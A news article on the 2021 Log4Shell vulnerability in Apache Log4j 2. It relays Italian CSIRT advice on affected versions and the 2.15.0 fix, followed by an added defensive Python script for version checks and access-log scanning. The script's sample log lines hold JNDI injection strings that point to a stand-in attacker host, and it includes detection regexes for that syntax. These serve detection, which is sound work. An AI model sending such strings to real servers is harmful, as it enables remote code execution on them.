The body led by Roberto Baldoni warns about the Log4j open source module on which various applications depend. The first signs of exploitation of the bug were recorded on Minecraft.
13 Dec 2021, Domenico Aliperto
In the past 48 hours, several cybersecurity experts have recorded a critical vulnerability. It is Log4Shell, which affects the Apache Project's open source Log4j module, a component at the heart of many applications hosted on servers around the world. The National Cybersecurity Agency announced it. The first signs of Log4Shell exploitation seem to have appeared on Minecraft, Microsoft's video game platform, but technology giants such as Amazon, Apple and Twitter, which are running for cover to protect themselves, are now also reported to be threatened.
What vulnerability implies
"This involves the presence of a vast and diversified attack surface on the entire Internet network," reads a note, "and its simplicity of exploitation, even by unsophisticated actors, makes the reported vulnerability particularly serious."
The technicians of the National Cybersecurity Agency, in constant contact with their European and international counterparts, recommend, given the danger of the vulnerability, "minimizing its exposure on the internet by applying the necessary measures to their servers in the shortest time possible". The Italian chapter of the CSIRT (Computer Security Incident Response Team) is publishing security updates on its portal, including the procedures to resolve the vulnerability, to which the technical managers of public and private IT services are invited to refer.

"The critical-level vulnerability," explains the CSIRT, "which is assigned the maximum score (CVSSv3: 10) as it allows remote code execution without authentication, is known as Log4Shell and affects Java-based applications that use the Log4j 2 product from version 2.0 up to 2.14.1. Any exploitation of the flaw allows the execution of arbitrary code to the detriment of the affected application. Attackers, who do not require prior access to the system, can send a malformed https request via a specially prepared string, to generate a log on Log4j, which uses JNDI (Java Naming and Directory Interface), in order to record the malicious string in the application log. During the processing of the log," the CSIRT continues, "the vulnerable system will be in a position to execute the code specifically entered by the attacker. This condition can, for example, lead the application to make a request to a malicious domain to execute a malicious payload." In this way, the attacker can acquire control of the affected application and complete access to the system.
Apache announces the resolution of the vulnerability
Log4j 2 is a logging library widely used in the development of business systems: it is included in various open-source software packages and is often integrated directly into important software applications. For this reason, the scope of the impact potentially extends to thousands of products and devices, including Apache's own, such as Struts 2, Solr, Druid, Flink and Swift. Since the affected component is a Java library, which is by nature cross-platform, the impact covers both Windows and Linux systems, and backend systems and microservices are also potentially vulnerable. The Apache Software Foundation explains that the vulnerability was addressed in the Log4j 2.15.0 update. The CSIRT's advice is to install it and, where this is not possible, to reduce the attack surface with the series of mitigations it lists. "Because many Java-based applications can take advantage of Log4j 2," the agency team warns, "organizations should consider contacting application vendors or making sure their Java applications are running the latest available version of the product."
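Two checks a defender would want to automate from the facts above, written here as an added example that is not code from the article, the CSIRT or the Apache project: first, whether a Log4j 2 version string falls inside the range the CSIRT names as affected (2.0 up to 2.14.1, fixed in 2.15.0); second, a scan of web-server access-log lines for the Log4j lookup syntax the CSIRT describes, the string that makes the library perform a JNDI lookup. The access-log lines are constructed samples, the domain is an RFC-reserved example name, and the percent-decoding step is an assumption about how such strings may arrive rather than anything the article states.

```python
"""Defender-side helpers for the Log4Shell situation described in the article.

Added example (not from the article, the CSIRT or Apache). It checks a
Log4j 2 version against the affected range quoted by the CSIRT and scans
access-log lines for Log4j lookup strings. All sample data is constructed.
"""
import re
from typing import List, Tuple
from urllib.parse import unquote

# Range quoted by the CSIRT: Log4j 2 from 2.0 up to 2.14.1; 2.15.0 is the fix.
FIRST_AFFECTED = (2, 0, 0)
LAST_AFFECTED = (2, 14, 1)


def parse_version(version: str) -> Tuple[int, ...]:
    """Turn '2.14.1' or '2.0-beta9' into a comparable tuple such as (2, 14, 1).
    Pre-release suffixes are dropped and missing components count as 0."""
    core = re.match(r"(\d+)(?:\.(\d+))?(?:\.(\d+))?", version.strip())
    if not core:
        raise ValueError(f"unrecognised version string: {version!r}")
    return tuple(int(p) if p else 0 for p in core.groups())


def is_affected_version(version: str) -> bool:
    """True if the Log4j 2 version lies in the affected range (inclusive)."""
    return FIRST_AFFECTED <= parse_version(version) <= LAST_AFFECTED


# Literal "${jndi:" in any letter case: the lookup form the CSIRT describes.
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)
# Any Log4j lookup syntax "${name:...}" inside a request field is unexpected in
# ordinary traffic, so it is flagged at a lower severity whatever the name.
ANY_LOOKUP = re.compile(r"\$\{[^}]*:[^}]*\}")


def normalize(line: str) -> str:
    """Percent-decode a bounded number of times (assumption: request fields may be
    URL-encoded once or more before they reach the log)."""
    for _ in range(3):
        decoded = unquote(line)
        if decoded == line:
            break
        line = decoded
    return line


def classify_line(line: str) -> str:
    """Return 'jndi' for a JNDI lookup string, 'lookup' for any other
    Log4j-style lookup, or 'clean'."""
    text = normalize(line)
    if JNDI_LOOKUP.search(text):
        return "jndi"
    if ANY_LOOKUP.search(text):
        return "lookup"
    return "clean"


def scan_access_log(lines: List[str]) -> List[Tuple[int, str, str]]:
    """Return (line_number, verdict, raw_line) for every line that is not clean."""
    hits = []
    for number, line in enumerate(lines, start=1):
        verdict = classify_line(line)
        if verdict != "clean":
            hits.append((number, verdict, line))
    return hits


# Constructed access-log lines in combined-log format (not real traffic).
SAMPLE_ACCESS_LOG = [
    '203.0.113.10 - - [13/Dec/2021:09:14:02 +0100] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.11 - - [13/Dec/2021:09:14:05 +0100] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://attacker.example/a}"',
    '203.0.113.12 - - [13/Dec/2021:09:14:09 +0100] "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2Fattacker.example%2Fa%7D HTTP/1.1" 400 0 "-" "curl/7.68"',
    '203.0.113.13 - - [13/Dec/2021:09:14:11 +0100] "GET /login HTTP/1.1" 200 800 "-" "${env:HOME}"',
]

if __name__ == "__main__":
    for v in ("2.0", "2.14.1", "2.15.0", "1.2.17"):
        print(f"Log4j {v}: {'AFFECTED' if is_affected_version(v) else 'not in affected range'}")
    for number, verdict, line in scan_access_log(SAMPLE_ACCESS_LOG):
        print(f"line {number}: {verdict}: {line}")
```

The version check only tells you whether a given Log4j 2 artefact is in the quoted range; it does not find the artefacts, which is the harder inventory problem the CSIRT's advice to contact vendors is about. The log scanner reports a lower-severity "lookup" verdict for any `${...:...}` string so that variants which avoid the literal `jndi` spelling still surface for review.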
Comment
We have not used this library, as for updating 3 billion computers… Wishes.